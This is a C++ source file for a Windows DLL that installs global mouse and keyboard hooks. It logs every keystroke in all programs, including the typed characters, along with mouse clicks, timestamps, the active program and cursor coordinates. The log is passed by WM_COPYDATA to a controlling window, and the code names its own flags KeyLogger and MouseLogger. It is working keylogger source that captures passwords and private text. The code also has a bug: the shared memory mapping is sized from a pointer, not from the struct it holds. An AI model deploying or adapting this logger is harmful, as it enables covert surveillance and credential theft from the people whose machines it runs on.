// HookMouse.cpp : Defines the initialization routines for the DLL.
//

#include "stdafx.h"
#include <afxdllx.h>
#include "HookMouse.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

LRESULT CALLBACK MouseHook(int nCode, WPARAM wParam, LPARAM lParam)
{
   LRESULT r;
   COPYDATASTRUCT CDS;
   CDataOfEvent data;
   char FileName[255]="";
   char dbuffer [9];
   char tbuffer [9];
   POINT pt;

   if((nCode<0) || (CommonArea->Pause))
   {
       r=CallNextHookEx(CommonArea->HookHandleMouse, nCode, wParam, lParam);
	   return r;
   }
   if(nCode==HCBT_CLICKSKIPPED)
   {
       switch(wParam)
	   {
          case WM_LBUTTONUP:
           _strdate( dbuffer );
           _strtime( tbuffer );
           sprintf(data.Date, "%s %s", dbuffer, tbuffer);
           GetModuleFileName(GetModuleHandle(NULL), FileName, sizeof(FileName));
           strcpy(data.ApplicName, FileName);
           strcpy(data.Event, "Najata levaia knopka mishi");
  		   GetCursorPos(&pt);
           sprintf(data.Coordin, "X=%d Y=%d", pt.x, pt.y);

           CDS.dwData=0;
           CDS.cbData=sizeof(CDataOfEvent);
           CDS.lpData=&data;
		   SendMessage((HWND)CommonArea->FormHandle, WM_COPYDATA, 0, (LPARAM)&CDS);
		  break;
          case WM_RBUTTONUP:
           _strdate( dbuffer );
           _strtime( tbuffer );
           sprintf(data.Date, "%s %s", dbuffer, tbuffer);
           GetModuleFileName(GetModuleHandle(NULL), FileName, sizeof(FileName));
           strcpy(data.ApplicName, FileName);
           strcpy(data.Event, "Najata pravaia knopka mishi");
  		   GetCursorPos(&pt);
           sprintf(data.Coordin, "X=%d Y=%d", pt.x, pt.y);

           CDS.dwData=0;
           CDS.cbData=sizeof(CDataOfEvent);
           CDS.lpData=&data;
		   SendMessage((HWND)CommonArea->FormHandle, WM_COPYDATA, 0, (LPARAM)&CDS);
		  break;
          case WM_MBUTTONUP:
           _strdate( dbuffer );
           _strtime( tbuffer );
           sprintf(data.Date, "%s %s", dbuffer, tbuffer);
           GetModuleFileName(GetModuleHandle(NULL), FileName, sizeof(FileName));
           strcpy(data.ApplicName, FileName);
           strcpy(data.Event, "Najata srednia knopka mishi");
  		   GetCursorPos(&pt);
           sprintf(data.Coordin, "X=%d Y=%d", pt.x, pt.y);

           CDS.dwData=0;
           CDS.cbData=sizeof(CDataOfEvent);
           CDS.lpData=&data;
		   SendMessage((HWND)CommonArea->FormHandle, WM_COPYDATA, 0, (LPARAM)&CDS);
		  break;
          case WM_MOUSEWHEEL:
	       _strdate( dbuffer );
           _strtime( tbuffer );
           sprintf(data.Date, "%s %s", dbuffer, tbuffer);
           GetModuleFileName(GetModuleHandle(NULL), FileName, sizeof(FileName));
           strcpy(data.ApplicName, FileName);
           strcpy(data.Event, "Skrolling mishi");
  		   GetCursorPos(&pt);
           sprintf(data.Coordin, "X=%d Y=%d", pt.x, pt.y);
		   
           CDS.dwData=0;
           CDS.cbData=sizeof(CDataOfEvent);
           CDS.lpData=&data;
		   SendMessage((HWND)CommonArea->FormHandle, WM_COPYDATA, 0, (LPARAM)&CDS);
   		  break;
	   }
   }
   r=CallNextHookEx(CommonArea->HookHandleMouse, nCode, wParam, lParam);
   return r;
}

LRESULT CALLBACK KeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)
{
   LRESULT r;
   COPYDATASTRUCT CDS;
   CDataOfEvent data;
   char FileName[255]="";
   char dbuffer [9];
   char tbuffer [9];
   POINT pt;
   byte buf[256];
   unsigned short buf_out;

   if((nCode<0) || (CommonArea->Pause))
   {
       r=CallNextHookEx(CommonArea->HookHandleKey, nCode, wParam, lParam);
	   return r;
   };
   if((lParam & 0x80000000)!=0)
   {
   	   switch (wParam)
	   {
	       case 0x01:
             sprintf(data.Event, "%s%X%s","Najata klavisha LBUTTON (0x", wParam, ")");  
           break;
           case 0x02:
             sprintf(data.Event, "%s%X%s","Najata klavisha RBUTTON (0x", wParam, ")");
           break;
           case 0x03:
             sprintf(data.Event, "%s%X%s","Najata klavisha CANCEL (0x", wParam, ")");
           break;
           case 0x04:
             sprintf(data.Event, "%s%X%s","Najata klavisha MBUTTON (0x", wParam, ")");
           break;
           case 0x08:
			 sprintf(data.Event, "%s%X%s","Najata klavisha BACK (0x", wParam, ")");
           break;
           case 0x12:
			 sprintf(data.Event, "%s%X%s","Najata klavisha ALT (0x", wParam, ")");
           break;
           case 0x09:
			 sprintf(data.Event, "%s%X%s","Najata klavisha TAB (0x", wParam, ")");
           break;
           case 0x0C:
			 sprintf(data.Event, "%s%X%s","Najata klavisha CLEAR (0x", wParam, ")");
           break;
           case 0x0D:
			 sprintf(data.Event, "%s%X%s","Najata klavisha RETURN (0x", wParam, ")");
           break;
           case 0x10:
			 sprintf(data.Event, "%s%X%s","Najata klavisha SHIFT (0x", wParam, ")");
           break;
           case 0x11:
			 sprintf(data.Event, "%s%X%s","Najata klavisha CONTROL (0x", wParam, ")");
           break;
           case 0x6C:
			 sprintf(data.Event, "%s%X%s","Najata klavisha SEPARATOR (0x", wParam, ")");
           break;
           case 0x13:
			 sprintf(data.Event, "%s%X%s","Najata klavisha PAUSE (0x", wParam, ")");
           break;
           case 0x14:
			 sprintf(data.Event, "%s%X%s","Najata klavisha CAPITAL (0x", wParam, ")");
           break;
           case 0x1B:
			 sprintf(data.Event, "%s%X%s","Najata klavisha ESCAPE (0x", wParam, ")");
           break;
           case 0x20:
			 sprintf(data.Event, "%s%X%s","Najata klavisha SPACE (0x", wParam, ")");
           break;
           case 0x21:
			 sprintf(data.Event, "%s%X%s","Najata klavisha PRIOR (0x", wParam, ")");
           break;
           case 0x22:
			 sprintf(data.Event, "%s%X%s","Najata klavisha NEXT (0x", wParam, ")");
           break;
           case 0x23:
			 sprintf(data.Event, "%s%X%s","Najata klavisha END (0x", wParam, ")");
           break;
           case 0x24:
			 sprintf(data.Event, "%s%X%s","Najata klavisha HOME (0x", wParam, ")");
           break;
           case 0x25:
			 sprintf(data.Event, "%s%X%s","Najata klavisha LEFT (0x", wParam, ")");
           break;
           case 0x26:
			 sprintf(data.Event, "%s%X%s","Najata klavisha UP (0x", wParam, ")");
           break;
           case 0x27:
			 sprintf(data.Event, "%s%X%s","Najata klavisha RIGHT (0x", wParam, ")");
           break;
           case 0x28:
			 sprintf(data.Event, "%s%X%s","Najata klavisha DOWN (0x", wParam, ")");
           break;
           case 0x29:
			 sprintf(data.Event, "%s%X%s","Najata klavisha SELECT (0x", wParam, ")");
           break;
           case 0x2A:
			 sprintf(data.Event, "%s%X%s","Najata klavisha PRINT (0x", wParam, ")");
           break;
           case 0x2B:
			 sprintf(data.Event, "%s%X%s","Najata klavisha EXECUTE (0x", wParam, ")");
           break;
           case 0x2C:
			 sprintf(data.Event, "%s%X%s","Najata klavisha SNAPSHOT (0x", wParam, ")");
           break;
           case 0x2D:
             sprintf(data.Event, "%s%X%s","Najata klavisha INSERT (0x", wParam, ")");  
           break;
           case 0x2E:
             sprintf(data.Event, "%s%X%s","Najata klavisha DELETE (0x", wParam, ")");  
           break;
           case 0x2F:
             sprintf(data.Event, "%s%X%s","Najata klavisha HELP (0x", wParam, ")");  
           break;
           case 0x60:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD0 (0x", wParam, ")");  
           break;
           case 0x61:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD1 (0x", wParam, ")");  
           break;
           case 0x62:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD2 (0x", wParam, ")");  
           break;
           case 0x63:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD3 (0x", wParam, ")");  
           break;
           case 0x64:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD4 (0x", wParam, ")");  
           break;
           case 0x65:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD5 (0x", wParam, ")");  
           break;
           case 0x66:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD6 (0x", wParam, ")");  
           break;
           case 0x67:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD7 (0x", wParam, ")");  
           break;
           case 0x68:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD8 (0x", wParam, ")");  
           break;
           case 0x69:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMPAD9 (0x", wParam, ")");  
           break;
           case 0x6A:
             sprintf(data.Event, "%s%X%s","Najata klavisha MULTIPLY (0x", wParam, ")");  
           break;
           case 0x6B:
             sprintf(data.Event, "%s%X%s","Najata klavisha ADD (0x", wParam, ")");  
           break;
           case 0x6D:
             sprintf(data.Event, "%s%X%s","Najata klavisha SUBTRACT (0x", wParam, ")");  
           break;
           case 0x6E:
             sprintf(data.Event, "%s%X%s","Najata klavisha DECIMAL (0x", wParam, ")");  
           break;
           case 0x6F:
             sprintf(data.Event, "%s%X%s","Najata klavisha DIVIDE (0x", wParam, ")");  
           break;
           case 0x70:
             sprintf(data.Event, "%s%X%s","Najata klavisha F1 (0x", wParam, ")");  
           break;
           case 0x71:
             sprintf(data.Event, "%s%X%s","Najata klavisha F2 (0x", wParam, ")");  
           break;
           case 0x72:
             sprintf(data.Event, "%s%X%s","Najata klavisha F3 (0x", wParam, ")");  
           break;
           case 0x73:
             sprintf(data.Event, "%s%X%s","Najata klavisha F4 (0x", wParam, ")");  
           break;
           case 0x74:
             sprintf(data.Event, "%s%X%s","Najata klavisha F5 (0x", wParam, ")");  
           break;
           case 0x75:
             sprintf(data.Event, "%s%X%s","Najata klavisha F6 (0x", wParam, ")");  
           break;
           case 0x76:
             sprintf(data.Event, "%s%X%s","Najata klavisha F7 (0x", wParam, ")");  
           break;
           case 0x77:
             sprintf(data.Event, "%s%X%s","Najata klavisha F8 (0x", wParam, ")");  
           break;
           case 0x78:
             sprintf(data.Event, "%s%X%s","Najata klavisha F9 (0x", wParam, ")");  
           break;
           case 0x79:
             sprintf(data.Event, "%s%X%s","Najata klavisha F10 (0x", wParam, ")");  
           break;
           case 0x7A:
             sprintf(data.Event, "%s%X%s","Najata klavisha F11 (0x", wParam, ")");  
           break;
           case 0x7B:
             sprintf(data.Event, "%s%X%s","Najata klavisha F12 (0x", wParam, ")");  
           break;
           case 0x7C:
             sprintf(data.Event, "%s%X%s","Najata klavisha F13 (0x", wParam, ")");  
           break;
           case 0x7D:
             sprintf(data.Event, "%s%X%s","Najata klavisha F14 (0x", wParam, ")");  
           break;
           case 0x7E:
             sprintf(data.Event, "%s%X%s","Najata klavisha F15 (0x", wParam, ")");  
           break;
           case 0x7F:
             sprintf(data.Event, "%s%X%s","Najata klavisha F16 (0x", wParam, ")");  
           break;
           case 0x80:
             sprintf(data.Event, "%s%X%s","Najata klavisha F17 (0x", wParam, ")");  
           break;
           case 0x81:
             sprintf(data.Event, "%s%X%s","Najata klavisha F18 (0x", wParam, ")");  
           break;
           case 0x82:
             sprintf(data.Event, "%s%X%s","Najata klavisha F19 (0x", wParam, ")");  
           break;
           case 0x83:
             sprintf(data.Event, "%s%X%s","Najata klavisha F20 (0x", wParam, ")");  
           break;
           case 0x84:
             sprintf(data.Event, "%s%X%s","Najata klavisha F21 (0x", wParam, ")");  
           break;
           case 0x85:
             sprintf(data.Event, "%s%X%s","Najata klavisha F22 (0x", wParam, ")");  
           break;
           case 0x86:
             sprintf(data.Event, "%s%X%s","Najata klavisha F23 (0x", wParam, ")");  
           break;
           case 0x87:
             sprintf(data.Event, "%s%X%s","Najata klavisha F24 (0x", wParam, ")");  
           break;
           case 0x90:
             sprintf(data.Event, "%s%X%s","Najata klavisha NUMLOCK (0x", wParam, ")");  
           break;
           case 0x91:
             sprintf(data.Event, "%s%X%s","Najata klavisha SCROLL (0x", wParam, ")");  
           break;
           case 0xA0:
             sprintf(data.Event, "%s%X%s","Najata klavisha LSHIFT (0x", wParam, ")");  
           break;
           case 0xA1:
             sprintf(data.Event, "%s%X%s","Najata klavisha RSHIFT (0x", wParam, ")");  
           break;
           case 0xA2:
             sprintf(data.Event, "%s%X%s","Najata klavisha LCONTROL (0x", wParam, ")");  
           break;
           case 0xA3:
             sprintf(data.Event, "%s%X%s","Najata klavisha RCONTROL (0x", wParam, ")");  
           break;
           case 0xA4:
             sprintf(data.Event, "%s%X%s","Najata klavisha LALT (0x", wParam, ")");  
           break;
           case 0xA5:
             sprintf(data.Event, "%s%X%s","Najata klavisha RALT (0x", wParam, ")");  
           break;
           default:
             GetKeyboardState(&buf[0]);
	         ToAscii(wParam, MapVirtualKey(wParam, 0), buf, &buf_out, 0);
             sprintf(data.Event, "%s%c%s%X%s","Najata klavisha '", (char)buf_out, "' (0x", wParam, ")");  
	   };
       _strdate( dbuffer );
       _strtime( tbuffer );
       sprintf(data.Date, "%s %s", dbuffer, tbuffer);
       GetModuleFileName(GetModuleHandle(NULL), FileName, sizeof(FileName));
       strcpy(data.ApplicName, FileName);
       GetCursorPos(&pt);
       sprintf(data.Coordin, "X=%d Y=%d", pt.x, pt.y);
		   
       CDS.dwData=0;
       CDS.cbData=sizeof(CDataOfEvent);
       CDS.lpData=&data;
	   SendMessage((HWND)CommonArea->FormHandle, WM_COPYDATA, 0, (LPARAM)&CDS);
   }

   r=CallNextHookEx(CommonArea->HookHandleKey, nCode, wParam, lParam);
   return r;
}


extern "C" __declspec(dllexport) BOOL SetHookMouse(BOOL Activate)
{ 
    BOOL bMouse=FALSE;
    BOOL bKey=FALSE;
    if(Activate)
	{
		if(CommonArea->MouseLogger)
		{
		    CommonArea->HookHandleMouse=SetWindowsHookEx(WH_CBT, &MouseHook, g_hInstance, 0);
		    bMouse=(CommonArea->HookHandleMouse!=0);
        }
		if(CommonArea->KeyLogger)
		{
            CommonArea->HookHandleKey=SetWindowsHookEx(WH_KEYBOARD, &KeyboardHook, g_hInstance, 0);
		    bKey=(CommonArea->HookHandleKey!=0);
		}
    }
	else
    {
       if(CommonArea->HookHandleMouse!=0)
       {
           bMouse=UnhookWindowsHookEx(CommonArea->HookHandleMouse);
           if(bMouse)
           CommonArea->HookHandleMouse=0;
       };
       if(CommonArea->HookHandleKey!=0)
       {
           bKey=UnhookWindowsHookEx(CommonArea->HookHandleKey);
           if(bKey)
           CommonArea->HookHandleKey=0;
       };
    }
    return (bMouse || bKey);
};


static AFX_EXTENSION_MODULE HookMouseDLL = { NULL, NULL };

extern "C" int APIENTRY
DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
	// Remove this if you use lpReserved
	UNREFERENCED_PARAMETER(lpReserved);
	
	if (dwReason == DLL_PROCESS_ATTACH)
	{
		g_hInstance=hInstance;
        Mapping=CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0,
         sizeof(CommonArea), GlobMapID); 
        CommonArea=(CMouseHookInfo*)MapViewOfFile(Mapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);
		
		
		
		//TRACE0("HOOKMOUSE.DLL Initializing!\n");
		
		// Extension DLL one-time initialization
		//if (!AfxInitExtensionModule(HookMouseDLL, hInstance))
			//return 0;

		// Insert this DLL into the resource chain
		// NOTE: If this Extension DLL is being implicitly linked to by
		//  an MFC Regular DLL (such as an ActiveX Control)
		//  instead of an MFC application, then you will want to
		//  remove this line from DllMain and put it in a separate
		//  function exported from this Extension DLL.  The Regular DLL
		//  that uses this Extension DLL should then explicitly call that
		//  function to initialize this Extension DLL.  Otherwise,
		//  the CDynLinkLibrary object will not be attached to the
		//  Regular DLL's resource chain, and serious problems will
		//  result.

		//new CDynLinkLibrary(HookMouseDLL);
	}
	else if (dwReason == DLL_PROCESS_DETACH)
	{
		TRACE0("HOOKMOUSE.DLL Terminating!\n");
		// Terminate the library before destructors are called
		AfxTermExtensionModule(HookMouseDLL);
	}
	return 1;   // ok
}
